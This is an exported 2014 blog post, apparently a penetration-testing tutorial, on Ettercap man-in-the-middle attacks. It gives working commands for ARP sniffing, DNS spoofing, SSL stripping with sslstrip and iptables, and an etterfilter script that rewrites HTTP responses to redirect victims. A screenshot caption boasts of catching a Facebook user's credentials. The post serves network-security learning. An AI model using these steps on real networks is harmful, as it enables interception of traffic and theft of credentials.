{"id":528,"date":"2014-01-14T19:39:25","date_gmt":"2014-01-15T02:39:25","guid":{"rendered":"http:\/\/somethingk.com\/main\/?p=528"},"modified":"2014-01-14T19:39:25","modified_gmt":"2014-01-15T02:39:25","slug":"ettercap-man-in-the-middle-fun","status":"publish","type":"post","link":"https:\/\/somethingk.com\/main\/ettercap-man-in-the-middle-fun\/","title":{"rendered":"Ettercap Man-in-the-Middle Fun!"},"content":{"rendered":"<p>Ethernet is a broadcast system. Messages sent over Ethernet from any one computer are broadcasted allowing other computers in the network to view and potentially intercept information. This vulnerability is what allows hackers to sniff packets and perform Man-in-the-Middle attacks (an attack where a hacker manipulates packets between its source and destination). What&#8217;s worse is that companies spend a lot of effort to keep hackers out but not as much to prevent hacking from within a network. These <a title=\"Link Layer\" href=\"http:\/\/en.wikipedia.org\/wiki\/Link_layer\" target=\"_blank\">link layer<\/a> type of attacks are especially dangerous because of the lack of firewalls within a network.<\/p>\n<p>One type of attack is known as ARP poisoning.\u00a0<a title=\"Address Resolution Protocol\" href=\"http:\/\/en.wikipedia.org\/wiki\/Address_Resolution_Protocol\" target=\"_blank\">ARP<\/a> utilizes the fact that requests are broadcasted for an IP\/MAC address resolution. In simplified terms, the resolution process consists of a device on a network \u00a0looking for a corresponding machine to a given address. It broadcasts ARP packets asking, who as this specific IP? The machine with that IP then responds, I do. A hacker can personally broadcast an ARP packet and poison all device stacks in the LAN, lying about its address and re-routing traffic. There isn\u2019t any required authentication for ARP\u2019s allowing this attack to be successful. The attacker can also reply to an ARP before the responding machines.<\/p>\n<p>Other attacks\/vulnerabilities performed on the link layer that take advantage of \u00a0broadcasts include:<\/p>\n<ul>\n<li>CAM Table Exhaustion<\/li>\n<li>ARP Spoofing<\/li>\n<li>DHCP Starvation<\/li>\n<\/ul>\n<p><a title=\"Ettercap Home Page\" href=\"http:\/\/ettercap.github.io\/ettercap\/\" target=\"_blank\">Ettercap<\/a> is an open-source tool used to perform man-in-the-middle attacks on a local area network. This tool will intercept packets coming between the user and gateway node, changing the content. I&#8217;ll go over just a few examples of the awesome crap it can do.<\/p>\n<p>I do NOT advocate using this information malicious, it&#8217;s important to learn the attacks in order to protect against them!<\/p>\n<p><span style=\"text-decoration: underline;\"><strong>ARP Sniffing<\/strong><\/span><\/p>\n<p>This attack monitors traffic. Hackers can \u2018sniff\u2019 or view incoming packets using this ettercap function. The screenshot below shows the ARP requests created when ettercap starts up.<\/p>\n<p><b>Execution Command:<\/b><\/p>\n<pre>ettercap \u2013TqM arp:remote \/&lt;Target IP Range&gt;\/ \/&lt;Gateway IP Range&gt;\/\r\n\r\n<a href=\"http:\/\/somethingk.com\/main\/wp-content\/uploads\/2014\/01\/arp.png\"><img fetchpriority=\"high\" decoding=\"async\" class=\"aligncenter size-full wp-image-534\" alt=\"Arp\" src=\"http:\/\/somethingk.com\/main\/wp-content\/uploads\/2014\/01\/arp.png\" width=\"1053\" height=\"197\" srcset=\"https:\/\/somethingk.com\/main\/wp-content\/uploads\/2014\/01\/arp.png 1053w, https:\/\/somethingk.com\/main\/wp-content\/uploads\/2014\/01\/arp-300x56.png 300w, https:\/\/somethingk.com\/main\/wp-content\/uploads\/2014\/01\/arp-1024x191.png 1024w\" sizes=\"(max-width: 1053px) 100vw, 1053px\" \/><\/a><\/pre>\n<p><span style=\"text-decoration: underline;\"><strong>DNS Hijacking<\/strong><\/span><\/p>\n<p>This attack will divert a machine to another DNS other than the one specified. Basically, the attack focuses on placing an entry into a computer\u2019s DNS cache. This causes a DNS to map to an incorrect IP address. DNS hijacking exploits the lack of authentication DNS uses. If the server does not validate responses locally, an incorrect entry can be inserted.<\/p>\n<p>First a device will make a request for a specific DNS entered by the user. The device will ask the DNS server for the resolved IP of a DNS. With the attack, the attacker answers instead of the DNS server. The requesting device will then cache the provided IP from the attacker to the DNS called for by the user. So instead of going to Google.com one can divert traffic to hack.com<\/p>\n<p><b>Edit Configuration File:<\/b><\/p>\n<ul>\n<li>Command:<\/li>\n<\/ul>\n<p><span style=\"font-family: Consolas, Monaco, monospace; font-size: 12px; line-height: 18px;\">vim \/usr\/local\/share\/ettercap\/etter.dns (Location in Backtrack 5 R2)<\/span><\/p>\n<ul>\n<li>Add entry:<\/li>\n<\/ul>\n<p><span style=\"font-family: Consolas, Monaco, monospace; font-size: 12px; line-height: 18px;\">&lt;DNS&gt; A &lt;Directed IP&gt;<\/span><\/p>\n<p><b>Execution Command: <\/b><\/p>\n<pre>ettercap -TqP dns_spoof -M arp:remote \/&lt;Gateway IP Range&gt;\/ \r\n\/&lt;Target IP Range&gt;\/<\/pre>\n<p><span style=\"text-decoration: underline;\"><strong>SSL MitM<\/strong><\/span><\/p>\n<p>This attack intercepts SSL packets, instead of credentials being passed safely to a host, credentials are sent in clear-text to the attacker. This is especially villainous.<\/p>\n<p><b>Change the ettercap configuration file:<\/b><\/p>\n<ul>\n<li>Change<\/li>\n<\/ul>\n<pre>ec_uid = 0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # nobody is the default\r\nec_gid = 0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # nobody is the default<\/pre>\n<ul>\n<li>Uncomment # if you use iptables:<\/li>\n<\/ul>\n<pre>redir_command_on = \"iptables -t nat -A PREROUTING -i %iface -p tcp \r\n--dport %port -j REDIRECT --to-port %rport\"\r\nredir_command_off = \"iptables -t nat -D PREROUTING -i %iface -p tcp \r\n--dport %port -j REDIRECT --to-port %rport\"<\/pre>\n<p><b>Execution Commands:<\/b><\/p>\n<ul>\n<li>Redirect requests on port 80:<\/li>\n<\/ul>\n<p><span style=\"font-family: Consolas, Monaco, monospace; font-size: 12px; line-height: 18px;\">sudo iptables -t nat -A PREROUTING -p tcp &#8211;destination-port 80 -j<\/span><\/p>\n<p><span style=\"font-family: Consolas, Monaco, monospace; font-size: 12px; line-height: 18px;\">REDIRECT &#8211;to-port 10000<\/span><\/p>\n<ul>\n<li>Verify entry in table:<\/li>\n<\/ul>\n<p><span style=\"font-family: Consolas, Monaco, monospace; font-size: 12px; line-height: 18px;\">sudo iptables &#8211;list -t nat<\/span><\/p>\n<ul>\n<li>Enable forwarding:<\/li>\n<\/ul>\n<p><span style=\"font-family: Consolas, Monaco, monospace; font-size: 12px; line-height: 18px;\">sudo echo &#8220;1&#8221; &gt; \/proc\/sys\/net\/ipv4\/ip_forward<\/span><\/p>\n<ul>\n<li>Run Ettercap:<\/li>\n<\/ul>\n<p><span style=\"font-family: Consolas, Monaco, monospace; font-size: 12px; line-height: 18px;\">ettercap \u2013TqM arp \/&lt;Gateway IP Range&gt;\/ \/&lt;Target IP Range&gt;\/<\/span><\/p>\n<ul>\n<li>Run sslstrip to block and hide certificate:<\/li>\n<\/ul>\n<p><span style=\"font-family: Consolas, Monaco, monospace; font-size: 12px; line-height: 18px;\">python \/pentest\/web\/sslstrip\/sslstrip.py \u2013a -k \u2013f<\/span><\/p>\n<figure id=\"attachment_533\" aria-describedby=\"caption-attachment-533\" style=\"width: 300px\" class=\"wp-caption aligncenter\"><a href=\"http:\/\/somethingk.com\/main\/wp-content\/uploads\/2014\/01\/Untitled.png\"><img decoding=\"async\" class=\"size-medium wp-image-533\" alt=\"I got you Facebook user\" src=\"http:\/\/somethingk.com\/main\/wp-content\/uploads\/2014\/01\/Untitled-300x18.png\" width=\"300\" height=\"18\" srcset=\"https:\/\/somethingk.com\/main\/wp-content\/uploads\/2014\/01\/Untitled-300x18.png 300w, https:\/\/somethingk.com\/main\/wp-content\/uploads\/2014\/01\/Untitled.png 885w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><figcaption id=\"caption-attachment-533\" class=\"wp-caption-text\">I got you Facebook user<\/figcaption><\/figure>\n<p><span style=\"text-decoration: underline;\"><strong>Filters<\/strong><\/span><\/p>\n<p>Filters can be created to manipulate packets to perform a desired function. The below filter monitors all packets and if it finds TCP traffic on port 80 it will manipulate the data. The first part of the filter will commit the encoding to plaintext. The second part of the filter will then report that the requested page has changed destinations and divert the user to a new destination page. The example below diverts all web requests to 192.168.200.201. ARPs are required to be performed on a local domain.<\/p>\n<p><b>Filter Script<\/b><\/p>\n<pre>if (ip.proto == TCP &amp;&amp; tcp.dst == 80){<\/pre>\n<pre>\u00a0\u00a0\u00a0\u00a0 if (search(DATA.data, \"Accept-Encoding\")){<\/pre>\n<pre>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 replace(\"Accept-Encoding\", \"Accept-Rubbish!\");<\/pre>\n<pre>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 msg(\"Zapped!\");<\/pre>\n<pre>\u00a0\u00a0\u00a0\u00a0 }<\/pre>\n<pre>}<\/pre>\n<pre>if (ip.proto == TCP &amp;&amp; tcp.src == 80){<\/pre>\n<pre>replace(\"200 OK\", \"301 Moved Permanently<\/pre>\n<pre>Location: http:\/\/192.168.200.201\/<\/pre>\n<pre>\");<\/pre>\n<pre>msg(\"redirect success\\n\");<\/pre>\n<pre>}<\/pre>\n<p><b>Command to compile filter: <\/b><\/p>\n<pre>Etterfilter &lt;Filter Text&gt; -o &lt;Compiled Filter&gt;<\/pre>\n<p><b>Execution Command:<\/b><\/p>\n<pre>ettercap -Tq -F &lt;Filter&gt; -M arp:remote \/&lt;Target IP Range&gt;\/ \r\n\/&lt;Gateway IP Range&gt;\/\r\n\r\n<a href=\"http:\/\/somethingk.com\/main\/wp-content\/uploads\/2014\/01\/filter.png\"><img decoding=\"async\" class=\"aligncenter size-medium wp-image-536\" alt=\"filter\" src=\"http:\/\/somethingk.com\/main\/wp-content\/uploads\/2014\/01\/filter-300x209.png\" width=\"300\" height=\"209\" srcset=\"https:\/\/somethingk.com\/main\/wp-content\/uploads\/2014\/01\/filter-300x209.png 300w, https:\/\/somethingk.com\/main\/wp-content\/uploads\/2014\/01\/filter.png 957w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Ethernet is a broadcast system. Messages sent over Ethernet from any one computer are broadcasted allowing other computers in the network to view and potentially intercept information. This vulnerability is what allows hackers to sniff packets and perform Man-in-the-Middle attacks (an attack where a hacker manipulates packets between its source and destination). What&#8217;s worse is that companies spend a lot [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[21,43,37,36,24],"tags":[124,127,123,125,126],"class_list":["post-528","post","type-post","status-publish","format-standard","hentry","category-backtrack","category-exploit","category-kali","category-network-capture","category-penetration-testing","tag-arp","tag-dns-hijacking","tag-ettercap","tag-poisoning","tag-sniffing"],"_links":{"self":[{"href":"https:\/\/somethingk.com\/main\/wp-json\/wp\/v2\/posts\/528","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/somethingk.com\/main\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/somethingk.com\/main\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/somethingk.com\/main\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/somethingk.com\/main\/wp-json\/wp\/v2\/comments?post=528"}],"version-history":[{"count":12,"href":"https:\/\/somethingk.com\/main\/wp-json\/wp\/v2\/posts\/528\/revisions"}],"predecessor-version":[{"id":544,"href":"https:\/\/somethingk.com\/main\/wp-json\/wp\/v2\/posts\/528\/revisions\/544"}],"wp:attachment":[{"href":"https:\/\/somethingk.com\/main\/wp-json\/wp\/v2\/media?parent=528"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/somethingk.com\/main\/wp-json\/wp\/v2\/categories?post=528"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/somethingk.com\/main\/wp-json\/wp\/v2\/tags?post=528"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}